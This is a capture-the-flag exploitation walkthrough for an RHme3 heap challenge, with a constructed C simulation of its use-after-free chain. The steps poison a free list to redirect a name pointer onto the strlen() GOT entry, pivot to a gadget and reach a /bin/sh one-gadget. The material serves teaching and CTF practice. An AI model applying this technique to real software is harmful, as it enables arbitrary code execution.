- Create player1 and set every field to 0x21 (recognisable filler, easy to spot in memory).
- Add, select, then remove player2: the "selected" pointer is not cleared on removal, so it keeps pointing into freed memory (use-after-free).
- Edit player2 through the dangling pointer so that the freed chunk points at player1's data.
- Write the address of the strlen() GOT entry into player2's name; this overwrites player1's name pointer.
- Edit player1's name: the program dereferences the corrupted name pointer (now the GOT entry) and writes the new name over the GOT slot.
- Point strlen() at a gadget that pivots the stack into attacker-controlled data.
- ROP to clear a couple of registers so the one-gadget's preconditions hold, then jump to the /bin/sh one-gadget.
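The following is a constructed model of the use-after-free chain in steps 2 through 6, added here as an illustration; it is not code from the writeup or from the challenge binary. The struct layout (four 32-bit attributes followed by the name pointer), the single-size-class allocator with its link stored in the first eight bytes of a freed chunk (the way glibc fastbin and tcache bins do it), the length-bounded name read, the stand-in GOT slot and gadget, and 64-bit little-endian pointers (x86-64) are all assumptions. The ROP stage of step 7 is not modelled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed player layout: four 32-bit attributes, then a pointer to a
 * separately allocated name buffer. Assumes x86-64 (little-endian, 8-byte pointers). */
#define NAME_LEN 24
typedef struct player {
    uint32_t attack, defense, speed, precision;
    char *name;
} player_t;

/* Toy allocator: one size class, inline LIFO free list like a fastbin/tcache bin.
 * The first 8 bytes of a freed chunk hold the link to the next free chunk.
 * A static arena keeps addresses deterministic for the demo. */
#define CHUNK 32
#define NCHUNKS 8
static union { uint64_t align; unsigned char bytes[CHUNK]; } arena[NCHUNKS];
static void *free_head;
static int fresh;

static void *sim_alloc(void) {
    if (free_head) {                               /* reuse: follow the inline link */
        void *p = free_head;
        memcpy(&free_head, p, sizeof free_head);
        return p;
    }
    assert(fresh < NCHUNKS);
    return arena[fresh++].bytes;
}
static void sim_free(void *p) {                    /* push: link overlays old data */
    memcpy(p, &free_head, sizeof free_head);
    free_head = p;
}

/* Stand-ins for the strlen() GOT slot and for the stack-pivot gadget
 * (the gadget just returns a marker instead of pivoting). */
typedef size_t (*strlen_fn)(const char *);
static strlen_fn got_strlen = strlen;
static size_t pivot_gadget(const char *s) { (void)s; return 0xdead; }

static player_t *players[4];
static int nplayers;
static player_t *selected;                         /* stale after remove_player: the bug */

/* Names are copied with a length-bounded read(), so NUL bytes in addresses survive. */
static int add_player(const void *name, size_t len, uint32_t v) {
    player_t *p = sim_alloc();
    p->attack = p->defense = p->speed = p->precision = v;
    p->name = sim_alloc();
    memcpy(p->name, name, len);
    players[nplayers] = p;
    return nplayers++;
}
static void select_player(int i) { selected = players[i]; }
static void remove_player(int i) {                 /* frees but never clears "selected" */
    sim_free(players[i]->name);
    sim_free(players[i]);
    players[i] = NULL;
}
static void edit_selected_attrs(uint32_t a, uint32_t d) { selected->attack = a; selected->defense = d; }
static void edit_selected_name(const void *name, size_t len) { memcpy(selected->name, name, len); }

/* Runs steps 1-6 and returns what the binary would now call as strlen(). */
strlen_fn run_exploit(void) {
    unsigned char name[NAME_LEN];
    uintptr_t v;
    memset(name, 0x21, sizeof name);
    int p1 = add_player(name, sizeof name, 0x21);   /* step 1 */
    int p2 = add_player(name, sizeof name, 0x21);   /* step 2: add, */
    select_player(p2);                               /* select,      */
    remove_player(p2);                               /* remove: "selected" now dangles */

    /* Step 3: player2's freed struct sits on the free list and its link overlays
     * attack/defense. Writing player1's address there through the stale pointer
     * makes the allocator hand out player1's struct as the next-but-one chunk. */
    v = (uintptr_t)players[p1];
    edit_selected_attrs((uint32_t)v, (uint32_t)(v >> 32));

    /* Step 4: the new player gets player2's old chunk as its struct and player1's
     * struct as its name buffer, so name bytes 16..23 land on player1's name pointer. */
    memset(name, 0x42, sizeof name);
    v = (uintptr_t)&got_strlen;
    memcpy(name + offsetof(player_t, name), &v, sizeof v);
    add_player(name, sizeof name, 0x21);

    /* Steps 5-6: editing player1's name writes through the corrupted pointer
     * straight into the GOT slot; the payload is the gadget's address. */
    select_player(p1);
    v = (uintptr_t)pivot_gadget;
    edit_selected_name(&v, sizeof v);
    return got_strlen;
}

int main(void) {
    strlen_fn f = run_exploit();
    printf("strlen GOT slot now %s\n", f == pivot_gadget ? "points at the gadget" : "untouched");
    return f == pivot_gadget ? 0 : 1;
}
```

Two details carry over to the real target: the edit in step 3 only works because user-controlled integer fields overlay the allocator's metadata in the freed chunk, and the name write in step 4 must be a length-bounded read rather than a string copy, since a GOT address contains zero bytes.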
Original writeup: https://flawed.net.nz/2017/08/29/rhme3-exploitation-writeup/